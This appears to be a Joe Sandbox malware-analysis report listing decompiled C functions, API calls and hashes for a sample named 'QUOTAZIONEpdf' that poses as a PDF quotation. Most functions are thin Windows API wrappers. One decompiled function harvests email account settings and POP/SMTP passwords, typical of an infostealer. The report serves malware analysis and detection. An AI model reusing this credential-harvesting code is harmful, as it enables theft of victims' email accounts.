                • Instruction ID: 27267517ebbd606c040c475238707358b0366275ca1c9c11413b547716cf2561
                • Opcode Fuzzy Hash: 7a0bb135e6e1f0606704ed46507384a8cac74e7a8e8860f1f6d7d5715d4ca302
                • Instruction Fuzzy Hash: 5AC04C7500424C7FEF026EF19D05C7B3F5EEB49618F448825BD18D5421DA37DA216664
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • WSAStartup.WS2_32(00000202,?), ref: 00404E08
                Memory Dump Source
                • Source File: 00000002.00000002.555947700.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000002.00000002.555985453.00000000004A0000.00000040.00000001.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_QUOTAZIONEpdf.jbxd
                Yara matches
                Similarity
                • API ID: Startup
                • String ID:
                • API String ID: 724789610-0
                • Opcode ID: aec8cb7098972fa6752499418e154eb0e8b54166df737fc870e0652f0f0fb75e
                • Instruction ID: edfb6e6a7b2c2d2c81179f298452045bbfcf768a57aceb16f5d93ae35c4528ea
                • Opcode Fuzzy Hash: aec8cb7098972fa6752499418e154eb0e8b54166df737fc870e0652f0f0fb75e
                • Instruction Fuzzy Hash: 6EC08C32AA421C9FD750AAB8AD0FAF0B7ACD30AB02F0002B56E1DC60C1E550582906E2
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E0040427D(WCHAR* _a4) {
                				int _t4;
                				void* _t5;
                
                				E004031E5(_t5, 0, 0xcac5886e, 0, 0);
                				_t4 = SetFileAttributesW(_a4, 0x2006); // executed
                				return _t4;
                			}






                APIs
                • SetFileAttributesW.KERNELBASE(00000000,00002006,00000000,CAC5886E,00000000,00000000,?,00412C3B,00000000,00000000,?), ref: 00404297
                Memory Dump Source
                • Source File: 00000002.00000002.555947700.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000002.00000002.555985453.00000000004A0000.00000040.00000001.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_QUOTAZIONEpdf.jbxd
                Yara matches
                Similarity
                • API ID: AttributesFile
                • String ID:
                • API String ID: 3188754299-0
                • Opcode ID: 8dd52a8075b7bef316d0fc581140073ef821e073e46509cdb91d5efed9f2b539
                • Instruction ID: e837d3b0865cda380a04769d40cc561620ee701a25bf2a33446201ee5459e2a9
                • Opcode Fuzzy Hash: 8dd52a8075b7bef316d0fc581140073ef821e073e46509cdb91d5efed9f2b539
                • Instruction Fuzzy Hash: A9C092B054430C3EFA102EF29D4AD3B3A8EEB41648B008435BE08E9096E977DE2061A8
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E00404A19(void* _a4, short* _a8, void** _a12) {
                				long _t5;
                				void* _t6;
                
                				E004031E5(_t6, 9, 0xdb552da5, 0, 0);
                				_t5 = RegOpenKeyW(_a4, _a8, _a12); // executed
                				return _t5;
                			}





                0x00404a27
                0x00404a35
                0x00404a38

                APIs
                • RegOpenKeyW.ADVAPI32(?,?,?,00000009,DB552DA5,00000000,00000000), ref: 00404A35
                Memory Dump Source
                • Source File: 00000002.00000002.555947700.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000002.00000002.555985453.00000000004A0000.00000040.00000001.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_QUOTAZIONEpdf.jbxd
                Yara matches
                Similarity
                • API ID: Open
                • String ID:
                • API String ID: 71445658-0
                • Opcode ID: 878e79dc60d56a32ccce77cf818dc40cd176942d244c38d6301a2c771aeba921
                • Instruction ID: b1d3f25f69c2166d3d07fcddbc0993e3b6974a4a806b5379996ceb22213e89af
                • Opcode Fuzzy Hash: 878e79dc60d56a32ccce77cf818dc40cd176942d244c38d6301a2c771aeba921
                • Instruction Fuzzy Hash: 5BC012311802087FFF012EC1CC02F483E1AAB08B55F044011BA18280E1EAB3A2205658
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E00403C40(void* _a4) {
                				int _t4;
                				void* _t5;
                
                				E004031E5(_t5, 0, 0xfbce7a42, 0, 0);
                				_t4 = FindCloseChangeNotification(_a4); // executed
                				return _t4;
                			}





                0x00403c4d
                0x00403c55
                0x00403c58

                APIs
                • FindCloseChangeNotification.KERNELBASE(00000000,00000000,FBCE7A42,00000000,00000000,?,00404344,00000000,?,?,004146E2,00000000,00000000,?,00000000,00000000), ref: 00403C55
                Memory Dump Source
                • Source File: 00000002.00000002.555947700.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000002.00000002.555985453.00000000004A0000.00000040.00000001.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_QUOTAZIONEpdf.jbxd
                Yara matches
                Similarity
                • API ID: ChangeCloseFindNotification
                • String ID:
                • API String ID: 2591292051-0
                • Opcode ID: 67fd61e36e72385b159b193fd7e1560e83aa445b7d913ea69a34d34039b65f78
                • Instruction ID: f60e35b61e15034c3e7e350ceef27d37971f1a6745175d5827dd76012fe363c0
                • Opcode Fuzzy Hash: 67fd61e36e72385b159b193fd7e1560e83aa445b7d913ea69a34d34039b65f78
                • Instruction Fuzzy Hash: 70B092B01182087EAE006AF29C05C3B3E4ECA4060874094267C08E5451F937DF2014B4
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E00403C08(WCHAR* _a4) {
                				int _t4;
                				void* _t5;
                
                				E004031E5(_t5, 0, 0xdeaa357b, 0, 0);
                				_t4 = DeleteFileW(_a4); // executed
                				return _t4;
                			}





                0x00403c15
                0x00403c1d
                0x00403c20

                APIs
                • DeleteFileW.KERNELBASE(?,00000000,DEAA357B,00000000,00000000), ref: 00403C1D
                Memory Dump Source
                • Source File: 00000002.00000002.555947700.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000002.00000002.555985453.00000000004A0000.00000040.00000001.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_QUOTAZIONEpdf.jbxd
                Yara matches
                Similarity
                • API ID: DeleteFile
                • String ID:
                • API String ID: 4033686569-0
                • Opcode ID: 01b23650ea3b3ad0b7ef3e64b7b20365c040140a899dd4cba48e3dfa7394e9f1
                • Instruction ID: 5639c68ad781144a2d68ff400f656d3d2c658e81fc8059c2e96e04b5885f7932
                • Opcode Fuzzy Hash: 01b23650ea3b3ad0b7ef3e64b7b20365c040140a899dd4cba48e3dfa7394e9f1
                • Instruction Fuzzy Hash: EDB092B04082093EAA013EF59C05C3B3E4DDA4010870048257D08E6111EA36DF1010A8
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E00402C1F(WCHAR* _a4) {
                				struct HINSTANCE__* _t4;
                				void* _t5;
                
                				E004031E5(_t5, 0, 0xe811e8d4, 0, 0);
                				_t4 = LoadLibraryW(_a4); // executed
                				return _t4;
                			}





                0x00402c2c
                0x00402c34
                0x00402c37

                APIs
                • LoadLibraryW.KERNELBASE(?,00000000,E811E8D4,00000000,00000000), ref: 00402C34
                Memory Dump Source
                • Source File: 00000002.00000002.555947700.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000002.00000002.555985453.00000000004A0000.00000040.00000001.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_QUOTAZIONEpdf.jbxd
                Yara matches
                Similarity
                • API ID: LibraryLoad
                • String ID:
                • API String ID: 1029625771-0
                • Opcode ID: af34b662912c89fdb3a0f1b9ff73cd040c3e05ef601eeab43baa4f39a88cbda5
                • Instruction ID: cd53f9395925d29cf68d66af6aae64644fca58afce9bbcd5edfe8b9605b00cd0
                • Opcode Fuzzy Hash: af34b662912c89fdb3a0f1b9ff73cd040c3e05ef601eeab43baa4f39a88cbda5
                • Instruction Fuzzy Hash: C9B092B00082083EAA002EF59C05C7F3A4DDA4410874044397C08E5411F937DE1012A5
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E00403BEF(void* _a4) {
                				int _t4;
                				void* _t5;
                
                				E004031E5(_t5, 0, 0xda6ae59a, 0, 0);
                				_t4 = FindClose(_a4); // executed
                				return _t4;
                			}





                0x00403bfc
                0x00403c04
                0x00403c07

                APIs
                • FindClose.KERNELBASE(00403F8D,00000000,DA6AE59A,00000000,00000000,?,00403F8D,00000000), ref: 00403C04
                Memory Dump Source
                • Source File: 00000002.00000002.555947700.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000002.00000002.555985453.00000000004A0000.00000040.00000001.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_QUOTAZIONEpdf.jbxd
                Yara matches
                Similarity
                • API ID: CloseFind
                • String ID:
                • API String ID: 1863332320-0
                • Opcode ID: 9873c53fda05388afb850746851f5e32e8254642b63e91831ef49aacf0f87411
                • Instruction ID: 1ebc74916e7009c76bd4f38d62a0f1d2d6d24e136e2668fcc01a71b48f24aa02
                • Opcode Fuzzy Hash: 9873c53fda05388afb850746851f5e32e8254642b63e91831ef49aacf0f87411
                • Instruction Fuzzy Hash: FDB092B00442087EEE002EF1AC05C7B3F4EDA4410970044257E0CE5012E937DF1010B4
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E00403BB7(WCHAR* _a4) {
                				long _t4;
                				void* _t5;
                
                				E004031E5(_t5, 0, 0xc6808176, 0, 0);
                				_t4 = GetFileAttributesW(_a4); // executed
                				return _t4;
                			}





                0x00403bc4
                0x00403bcc
                0x00403bcf

                APIs
                • GetFileAttributesW.KERNELBASE(00413D1F,00000000,C6808176,00000000,00000000,?,00403D58,00413D1F,?,00403C6D,00413D1F,?,00413D1F,00000000), ref: 00403BCC
                Memory Dump Source
                • Source File: 00000002.00000002.555947700.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000002.00000002.555985453.00000000004A0000.00000040.00000001.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_QUOTAZIONEpdf.jbxd
                Yara matches
                Similarity
                • API ID: AttributesFile
                • String ID:
                • API String ID: 3188754299-0
                • Opcode ID: 1d6dd25f7c332fd1d35fbf5985813ee51de81cf8f6e5d0f963c2f0c9ec148b39
                • Instruction ID: 12c622a32f4ce0ce5baf48af10e49973588d22e73ecb696d4958cc4f11b8a016
                • Opcode Fuzzy Hash: 1d6dd25f7c332fd1d35fbf5985813ee51de81cf8f6e5d0f963c2f0c9ec148b39
                • Instruction Fuzzy Hash: D2B092B05042083EAE012EF19C05C7B3A6DCA40148B4088297C18E5111ED36DE5050A4
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E004049FF(void* _a4) {
                				long _t3;
                				void* _t4;
                
                				E004031E5(_t4, 9, 0xd980e875, 0, 0);
                				_t3 = RegCloseKey(_a4); // executed
                				return _t3;
                			}





                0x00404a0d
                0x00404a15
                0x00404a18

                APIs
                • RegCloseKey.KERNELBASE(00000000,00000009,D980E875,00000000,00000000,?,00404A44,?,?,00404AC6,?), ref: 00404A15
                Memory Dump Source
                • Source File: 00000002.00000002.555947700.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000002.00000002.555985453.00000000004A0000.00000040.00000001.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_QUOTAZIONEpdf.jbxd
                Yara matches
                Similarity
                • API ID: Close
                • String ID:
                • API String ID: 3535843008-0
                • Opcode ID: a61027cf4d9072e61279d4b4f16a9571f3d05446971c54f2b184413104fd85b7
                • Instruction ID: 75bcc15c4d71fff8019d16f1d9debb39272117f3de5fdcc107556e34aff8dcac
                • Opcode Fuzzy Hash: a61027cf4d9072e61279d4b4f16a9571f3d05446971c54f2b184413104fd85b7
                • Instruction Fuzzy Hash: 7CC092312843087AEA102AE2EC0BF093E0D9B41F98F500025B61C3C1D2E9E3E6100099
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E00403B64(WCHAR* _a4) {
                				int _t3;
                				void* _t4;
                
                				E004031E5(_t4, 2, 0xdc0853e1, 0, 0);
                				_t3 = PathFileExistsW(_a4); // executed
                				return _t3;
                			}





                0x00403b72
                0x00403b7a
                0x00403b7d

                APIs
                • PathFileExistsW.KERNELBASE(?,00000002,DC0853E1,00000000,00000000), ref: 00403B7A
                Memory Dump Source
                • Source File: 00000002.00000002.555947700.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000002.00000002.555985453.00000000004A0000.00000040.00000001.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_QUOTAZIONEpdf.jbxd
                Yara matches
                Similarity
                • API ID: ExistsFilePath
                • String ID:
                • API String ID: 1174141254-0
                • Opcode ID: 79b415000e3dec3248a6d2155c6771fe406342b29d1d2faf8e1af97ba013cdd8
                • Instruction ID: 8bd75bc93bbce64143a6918826fd0663652f5dbe7ab318808702af7ec0dd126f
                • Opcode Fuzzy Hash: 79b415000e3dec3248a6d2155c6771fe406342b29d1d2faf8e1af97ba013cdd8
                • Instruction Fuzzy Hash: F4C0923028830C3BF9113AD2DC47F197E8D8B41B99F104025B70C3C4D2D9E3A6100199
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • closesocket.WS2_32(00404EB0), ref: 00404DEB
                Memory Dump Source
                • Source File: 00000002.00000002.555947700.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000002.00000002.555985453.00000000004A0000.00000040.00000001.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_QUOTAZIONEpdf.jbxd
                Yara matches
                Similarity
                • API ID: closesocket
                • String ID:
                • API String ID: 2781271927-0
                • Opcode ID: 887654383893d56b64fc04469bc98b787ac4c367861e76a9ad562a01a17cc3aa
                • Instruction ID: a7719220e23c04317d26723f710bfa070304820e6d91f105ed764937a1a9d613
                • Opcode Fuzzy Hash: 887654383893d56b64fc04469bc98b787ac4c367861e76a9ad562a01a17cc3aa
                • Instruction Fuzzy Hash: F4A0113000020CEBCB002B82EE088C83F2CEA882A0B808020F80C00020CB22A8208AC8
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E00403F9E(void* _a4) {
                				int _t3;
                				void* _t4;
                
                				E004031E5(_t4, 0, 0xf53ecacb, 0, 0);
                				_t3 = VirtualFree(_a4, 0, 0x8000); // executed
                				return _t3;
                			}





                0x00403fac
                0x00403fba
                0x00403fbe

                APIs
                • VirtualFree.KERNELBASE(0041028C,00000000,00008000,00000000,F53ECACB,00000000,00000000,00000000,?,0041028C,00000000), ref: 00403FBA
                Memory Dump Source
                • Source File: 00000002.00000002.555947700.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000002.00000002.555985453.00000000004A0000.00000040.00000001.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_QUOTAZIONEpdf.jbxd
                Yara matches
                Similarity
                • API ID: FreeVirtual
                • String ID:
                • API String ID: 1263568516-0
                • Opcode ID: 4437192c676a59da206b473fb72d9d26ef1781d862ceba0a26f5730449a5d479
                • Instruction ID: 31a36aa897feec3f2575a3818ba469950b8b51fe97d839facc05156de448dee4
                • Opcode Fuzzy Hash: 4437192c676a59da206b473fb72d9d26ef1781d862ceba0a26f5730449a5d479
                • Instruction Fuzzy Hash: 9CC08C3200613C32893069DBAC0AFCB7E0CDF036F4B104021F50C6404049235A0186F8
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E00406472(long _a4) {
                				void* _t3;
                				void* _t4;
                
                				_t3 = E004031E5(_t4, 0, 0xcfa329ad, 0, 0);
                				Sleep(_a4); // executed
                				return _t3;
                			}





                0x0040647f
                0x00406487
                0x0040648a

                APIs
                • Sleep.KERNELBASE(?,00000000,CFA329AD,00000000,00000000), ref: 00406487
                Memory Dump Source
                • Source File: 00000002.00000002.555947700.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000002.00000002.555985453.00000000004A0000.00000040.00000001.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_QUOTAZIONEpdf.jbxd
                Yara matches
                Similarity
                • API ID: Sleep
                • String ID:
                • API String ID: 3472027048-0
                • Opcode ID: 1807eaeb392d941871dd7f4dce37bd4a7f558bd6a955fa7349a6f4d515d7796f
                • Instruction ID: 8d08050a97d9600d7c0dbf2a5018eca7d85037e123ae0040efa9f3f0a7dd9c36
                • Opcode Fuzzy Hash: 1807eaeb392d941871dd7f4dce37bd4a7f558bd6a955fa7349a6f4d515d7796f
                • Instruction Fuzzy Hash: FBB092B08082083EEA002AF1AD05C3B7A8DDA4020870088257C08E5011E93ADE1150B9
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E004058EA(char* _a4, char* _a8) {
                				char* _t4;
                				void* _t5;
                
                				E004031E5(_t5, 2, 0xc5c16604, 0, 0);
                				_t4 = StrStrA(_a4, _a8); // executed
                				return _t4;
                			}





                0x004058f8
                0x00405903
                0x00405906

                APIs
                • StrStrA.KERNELBASE(?,?,00000002,C5C16604,00000000,00000000), ref: 00405903
                Memory Dump Source
                • Source File: 00000002.00000002.555947700.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000002.00000002.555985453.00000000004A0000.00000040.00000001.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_QUOTAZIONEpdf.jbxd
                Yara matches
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 042642b6324743061f7cb6dcc4248db4a99ff7c1e794a59b5538058313c095a3
                • Instruction ID: d5512459148ba4630ff55d530b0b04b7b8071b1588054f6e556ec5c474e97d6d
                • Opcode Fuzzy Hash: 042642b6324743061f7cb6dcc4248db4a99ff7c1e794a59b5538058313c095a3
                • Instruction Fuzzy Hash: 82C04C3118520876EA112AD19C07F597E1D9B45B68F108425BA1C6C4D19AB3A6505559
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E00405924(WCHAR* _a4, WCHAR* _a8) {
                				WCHAR* _t4;
                				void* _t5;
                
                				E004031E5(_t5, 2, 0xd6865bd4, 0, 0);
                				_t4 = StrStrW(_a4, _a8); // executed
                				return _t4;
                			}





                0x00405932
                0x0040593d
                0x00405940

                APIs
                • StrStrW.KERNELBASE(?,?,00000002,D6865BD4,00000000,00000000), ref: 0040593D
                Memory Dump Source
                • Source File: 00000002.00000002.555947700.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000002.00000002.555985453.00000000004A0000.00000040.00000001.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_QUOTAZIONEpdf.jbxd
                Yara matches
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 4bee70add85649cbd4a2768cfe9b9dcd091b7df8922090f97a094487be0f2036
                • Instruction ID: 5151f40d070928696ad3a3dfeafe9e6e8178c5ee17630b0dfe73cc98556a196c
                • Opcode Fuzzy Hash: 4bee70add85649cbd4a2768cfe9b9dcd091b7df8922090f97a094487be0f2036
                • Instruction Fuzzy Hash: 8FC04C311842087AEA112FD2DC07F587E1D9B45B58F104015B61C2C5D1DAB3A6105659
                Uniqueness

                Uniqueness Score: -1.00%

                Non-executed Functions

                C-Code - Quality: 88%
                			E0040D069(void* __ebx, void* __eflags, intOrPtr* _a4) {
                				signed int _v8;
                				signed int _v12;
                				intOrPtr _v16;
                				intOrPtr _v20;
                				intOrPtr _v24;
                				intOrPtr _v28;
                				intOrPtr _v32;
                				intOrPtr _v36;
                				intOrPtr _v40;
                				intOrPtr _v44;
                				void* __edi;
                				void* __esi;
                				intOrPtr _t40;
                				intOrPtr _t45;
                				intOrPtr _t47;
                				void* _t71;
                				void* _t75;
                				void* _t77;
                
                				_t72 = _a4;
                				_t71 = E00404BEE(__ebx,  *_a4, L"EmailAddress");
                				_t81 = _t71;
                				if(_t71 != 0) {
                					_push(__ebx);
                					_t67 = E00404BEE(__ebx,  *_t72, L"Technology");
                					_v16 = E00404BEE(_t37,  *_t72, L"PopServer");
                					_v40 = E00404BA7(_t81,  *_t72, L"PopPort");
                					_t40 = E00404BEE(_t37,  *_t72, L"PopAccount");
                					_v8 = _v8 & 0x00000000;
                					_v20 = _t40;
                					_v24 = E00404C4E(_t71,  *_t72, L"PopPassword",  &_v8);
                					_v28 = E00404BEE(_t67,  *_t72, L"SmtpServer");
                					_v44 = E00404BA7(_t81,  *_t72, L"SmtpPort");
                					_t45 = E00404BEE(_t67,  *_t72, L"SmtpAccount");
                					_v12 = _v12 & 0x00000000;
                					_v32 = _t45;
                					_t47 = E00404C4E(_t71,  *_t72, L"SmtpPassword",  &_v12);
                					_t77 = _t75 + 0x50;
                					_v36 = _t47;
                					if(_v8 != 0 || _v12 != 0) {
                						E00405872( *0x49f934, _t71, 1, 0);
                						E00405872( *0x49f934, _t67, 1, 0);
                						_t74 = _v16;
                						E00405872( *0x49f934, _v16, 1, 0);
                						E00405781( *0x49f934, _v40);
                						E00405872( *0x49f934, _v20, 1, 0);
                						_push(_v8);
                						E00405762(_v16,  *0x49f934, _v24);
                						E00405872( *0x49f934, _v28, 1, 0);
                						E00405781( *0x49f934, _v44);
                						E00405872( *0x49f934, _v32, 1, 0);
                						_push(_v12);
                						E00405762(_t74,  *0x49f934, _v36);
                						_t77 = _t77 + 0x88;
                					} else {
                						_t74 = _v16;
                					}
                					E0040471C(_t71);
                					E0040471C(_t67);
                					E0040471C(_t74);
                					E0040471C(_v20);
                					E0040471C(_v24);
                					E0040471C(_v28);
                					E0040471C(_v32);
                					E0040471C(_v36);
                				}
                				return 1;
                			}






















                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.555947700.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000002.00000002.555985453.00000000004A0000.00000040.00000001.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_QUOTAZIONEpdf.jbxd
                Yara matches
                Similarity
                • API ID:
                • String ID: EmailAddress$PopAccount$PopPassword$PopPort$PopServer$SmtpAccount$SmtpPassword$SmtpPort$SmtpServer$Technology
                • API String ID: 0-2111798378
                • Opcode ID: 4f23c8655d16a9709c8d74bd686147b8dbb65e0931b573aa619d5bf1b9c89d18
                • Instruction ID: 091e628055053f5eef329adcdd4db079f25726ad560f051e033024c376855220
                • Opcode Fuzzy Hash: 4f23c8655d16a9709c8d74bd686147b8dbb65e0931b573aa619d5bf1b9c89d18
                • Instruction Fuzzy Hash: AE414EB5941218BADF127BE6DD42F9E7F76EF94304F21003AF600721B2C77A99609B48
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • CoInitialize.OLE32(00000000), ref: 0040438F
                • CoCreateInstance.OLE32(00418EC0,00000000,00000001,00418EB0,?), ref: 004043A9
                • VariantInit.OLEAUT32(?), ref: 004043C4
                • SysAllocString.OLEAUT32(?), ref: 004043CD
                • VariantInit.OLEAUT32(?), ref: 00404414
                • SysAllocString.OLEAUT32(?), ref: 00404419
                • VariantInit.OLEAUT32(?), ref: 00404431
                Memory Dump Source
                • Source File: 00000002.00000002.555947700.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000002.00000002.555985453.00000000004A0000.00000040.00000001.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_QUOTAZIONEpdf.jbxd
                Yara matches
                Similarity
                • API ID: InitVariant$AllocString$CreateInitializeInstance
                • String ID:
                • API String ID: 1312198159-0
                • Opcode ID: 36af1e644ba25a92da10ffd92c092694d7a96ee7919212810e1bb10a92bc3d30
                • Instruction ID: 6cc2ba4480fbb4d68866773ab5e076051400aafb7d2546f6199fc19a864342a4
                • Opcode Fuzzy Hash: 36af1e644ba25a92da10ffd92c092694d7a96ee7919212810e1bb10a92bc3d30
                • Instruction Fuzzy Hash: 9A414C71A00609EFDB00EFE4DC84ADEBF79FF89314F10406AFA05AB190DB759A458B94
                Uniqueness

                Uniqueness Score: -1.00%